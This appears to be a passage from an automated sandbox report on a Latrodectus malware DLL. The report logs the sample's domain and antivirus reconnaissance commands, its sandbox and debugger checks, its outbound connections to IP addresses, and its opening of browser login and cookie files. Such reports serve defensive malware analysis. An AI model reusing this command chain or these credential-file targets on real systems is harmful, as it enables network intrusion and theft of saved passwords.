                      Source: C:\Windows\System32\rundll32.exe TID: 2220Thread sleep count: 545 > 30Jump to behavior
                      Source: C:\Windows\System32\rundll32.exe TID: 2220Thread sleep time: -545000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\rundll32.exe TID: 2952Thread sleep count: 668 > 30Jump to behavior
                      Source: C:\Windows\System32\rundll32.exe TID: 2952Thread sleep time: -66800s >= -30000sJump to behavior
                      Source: C:\Windows\System32\rundll32.exe TID: 2220Thread sleep count: 8786 > 30Jump to behavior
                      Source: C:\Windows\System32\rundll32.exe TID: 2220Thread sleep time: -8786000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16CA350 FindFirstFileW,FindNextFileW,LoadLibraryW,4_2_00000237C16CA350
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16C1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,4_2_00000237C16C1A08
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57E16F4 FindFirstFileW,FindNextFileW,8_3_000001E3B57E16F4
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57E6604 FindFirstFileA,FindNextFileA,8_3_000001E3B57E6604
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57EAC90 GetSystemInfo,8_3_000001E3B57EAC90
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCache\Jump to behavior
                      Source: Amcache.hve.9.drBinary or memory string: VMware
                      Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: rundll32.exe, 00000008.00000003.5096540598.000001E3B36C9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.3365701357.000001E3B36F9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.5096540598.000001E3B36F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: rundll32.exe, 00000008.00000003.5096540598.000001E3B36B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: rundll32.exe, 00000008.00000003.3366424299.000001E3B57B0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                      Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.9.drBinary or memory string: vmci.sys
                      Source: Amcache.hve.9.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: rundll32.exe, 00000004.00000002.2009327636.00000237C16F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rod_VMware_SATA_CD00
                      Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.9.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.9.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.9.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\System32\loaddll64.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57E76DC rdtsc 8_3_000001E3B57E76DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180070760 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0000000180070760
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180066C3C memset,GetLastError,IsDebuggerPresent,OutputDebugStringW,3_2_0000000180066C3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError,3_2_00000001800033E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000A7AC GetProcessHeap,3_2_000000018000A7AC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180070760 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0000000180070760
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018006F6E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_000000018006F6E0

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 104.21.46.75 443Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 172.67.219.28 443Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 104.21.84.207 443Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180066A50 memset,GetModuleFileNameW,GetCommandLineW,memset,ShellExecuteExW,CloseHandle,3_2_0000000180066A50
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c ipconfig /allJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c systeminfoJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trustsJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trustsJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c net view /all /domainJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c net view /allJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domainJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:ListJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c net config workstationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installedJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c whoami /groupsJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /allJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net config workstation
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018004A650 memset,GetModuleFileNameW,PathAppendW,ShellExecuteExW,ILGetSize,GetTickCount,srand,GetCurrentProcess,GetProcessId,GetCurrentThreadId,rand,LocalAlloc,InitializeSecurityDescriptor,LocalFree,SetSecurityDescriptorDacl,CreateFileMappingW,LocalFree,CreateFileMappingW,MapViewOfFile,CloseHandle,memset,memmove,memmove,memmove,memmove,memmove,UnmapViewOfFile,FindWindowW,SetForegroundWindow,memset,wsprintfW,memset,WaitForSingleObject,Sleep,CloseHandle,CloseHandle,CloseHandle,3_2_000000018004A650
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z,3_2_0000000180049278
                      Source: Update_27361bf8.dll.4.drBinary or memory string: Program managerProgmanSeShutdownPrivilegeSeTimeZonePrivilegeSeIncreaseWorkingSetPrivilegeSeUndockPrivilegeSeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeEnableLUASoftware\Microsoft\Windows\CurrentVersion\Policies\Systemseclogonwdc.dllWdcRunTaskAsInteractiveUser"%s" %swinsta0\defaultadvapi32.dllCreateProcessWithTokenW:open..\360DeskAna64.exe%u_%d_%d_%d_%use2/%s %s %use1SeTcbPrivilegeNT AUTHORITYLOCAL SERVICENETWORK SERVICE360utilexplorer.exe,
                      Source: rundll32.exeBinary or memory string: Progman
                      Source: rundll32.exeBinary or memory string: Program manager
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018006A304 GetSystemTimeAsFileTime,3_2_000000018006A304
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000237C16C8AE0 GetUserNameA,wsprintfA,4_2_00000237C16C8AE0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B5879708 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,8_3_000001E3B5879708
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180040CB0 GetVersionExW,memset,SHGetValueW,atoi,GetVersion,GetModuleHandleW,GetProcAddress,3_2_0000000180040CB0
                      Source: C:\Windows\System32\nltest.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.9.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.9.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: WMIC.exe, 0000002E.00000002.3603221317.000001ABBBFAA000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3601583977.000001ABBBDA7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3601666880.000001ABBC4D1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3602672974.000001ABBBDAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pathToSignedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: WMIC.exe, 0000002E.00000002.3603221317.000001ABBBFAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gnedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: WMIC.exe, 0000002E.00000002.3602844676.000000800E378000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ndows Defender\MsMpeng.exe
                      Source: WMIC.exe, 0000002E.00000003.3601583977.000001ABBBDA7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000002.3603092587.000001ABBBDA7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3602735400.000001ABBBDA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Files%\Windows Defender\MsMpeng.exe
                      Source: rundll32.exeBinary or memory string: 360tray.exe
                      Source: rundll32.exeBinary or memory string: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
                      Source: WMIC.exe, 0000002E.00000002.3603221317.000001ABBBFAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: indows Defender\MsMpeng.exe
                      Source: WMIC.exe, 0000002E.00000003.3602239295.000001ABBC4B1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3601583977.000001ABBBDA7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3602219141.000001ABBC4B0000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3602672974.000001ABBBDAE000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3601495070.000001ABBBD86000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000002.3603064300.000001ABBBD89000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002E.00000003.3601583977.000001ABBBD87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: rundll32.exeBinary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
                      Source: Amcache.hve.9.drBinary or memory string: MsMpEng.exe
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Latrodectus
                      Source: Yara matchFile source: 3.2.rundll32.exe.14614300000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.146142f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.146142f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.237c16b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.14614300000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.237c16c0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.237c16c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000003.3416839119.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2270260674.00000146142F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.3502863339.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.3367002817.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.3124323699.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2008946508.00000237C16B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.3178827371.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.3440249504.000001E3B56E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.3416817098.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.3264216780.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.3041610792.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2270295766.0000014614300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2008986338.00000237C16C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 180, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Suhba\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Bromium\User Data\Default\Network\CookiesJump to behavior
